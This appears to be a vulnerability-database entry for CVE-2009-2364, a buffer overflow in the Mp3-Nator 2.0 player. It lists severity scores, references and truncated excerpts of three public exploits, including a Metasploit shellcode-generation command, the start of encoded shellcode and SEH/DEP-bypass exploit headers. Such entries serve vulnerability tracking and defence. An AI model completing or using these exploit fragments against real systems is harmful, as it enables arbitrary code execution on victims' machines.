CVE-2009-2364
Published 2009-07-08
Priority P3 42 · critical · 9.3 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 10.09% (95.1th percentile)
Stack-based buffer overflow in Mp3-Nator 2.0 allows remote attackers to execute arbitrary code via (1) a long string in a .plf file and (2) a long string in the listdata.dat file, possibly related to a track entry.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mp3-nator | mp3-nator | — | — |
No detection rules found.
Exploit-DB
MP3-Nator - Local Buffer Overflow (SEH) (DEP Bypass)
exploitdb·2010-11-18
---
# Exploit Title: Exploit Buffer Overflow MP3-Nator (SEH - DEP BYPASS)
# Date: 18-11-2010
# Author: Muhamad Fadzil Ramli - mind1355[at]gmail[dot]com
# Credit/Bug Found By: C4SS!0 G0M3S
# Software Link: http://www.brothersoft.com/d.php?soft_id=16524&url=http://files.brothersoft.com/mp3_audio/players/mp3nator.zip
# Version: 2.0
# Tested on: Windows XP SP3 EN - Latest Update (VMWARE FUSION - Version 3.1.1)
# CVE: N/A
#! /usr/bin/env ruby
filename = 'crash.plf'
# ./msfpayload windows/exec CMD=calc EXITFUNC=seh R | ./msfencode -e x86/alpha_mixed -b '\x00' -t ruby
# [*] x86/alpha_mixed succeeded with size 456 (iteration=1)
shellcode =
"\x89\xe3\xda\xcf\xd9\x73\xf4\x58\x50\x59\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\
Exploit-DB
MP3-Nator 2.0 - Local Buffer Overflow (SEH)
exploitdb·2010-11-11
---
#!usr/bin/python
#
#Exploit Title: Exploit Buffer Overflow MP3-Nator
#Date: 10\11\2010
#Author: C4SS!0 G0M3S
#Software Link: http://www.brothersoft.com/d.php?soft_id=16524&url=http%3A%2F%2Ffiles.brothersoft.com%2Fmp3_audio%2Fplayers%2Fmp3nator.zip
#Version: 2.0
#Tested on: WIN-XP SP3
#
#
#Writted By C4SS!0 G0M3S
#
#Home: http://wwww.google.com.br
#
#
#E-mail: [email protected]
#
#
import os,sys
def layout():
    os.system("cls")
    os.system("color 4f")
    print("\n[+]Exploit : Exploit Buffer Overflow MP3-NATOR v2.0")
    print("[+]Author : C4SS!0 G0M3S")
    print("[+]E-mail : [email protected]")
    print("[+]Home : http://www.invasao.com.br")
    print("[+]Impact : Hich")
    print("[+]Version : 2.0\n")
if len(sys.argv)!=2:
    layout()
    print("[-]Usage: Exploit.
Exploit-DB
MP3-Nator 2.0 - '.plf' Universal Buffer Overflow (SEH)
exploitdb·2009-07-01
---
#!/usr/bin/perl
#[+] Bug : Mp3-Nator 2.0 (plf) Universal Buffer Overflow Exploit (SEH)
#[+] Author : ThE g0bL!N
# # Greetz to all my friends
## Download:http://files.brothersoft.com/mp3_audio/players/mp3nator.zip
## Tested on: Windows XP Pro SP2 (Fr)
##########################################################
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
No writeups or analysis indexed.
http://www.exploit-db.com/exploits/9060
http://www.exploit-db.com/exploits/9136
http://www.vupen.com/english/advisories/2009/1765
https://exchange.xforce.ibmcloud.com/vulnerabilities/51486
2009-07-08
Published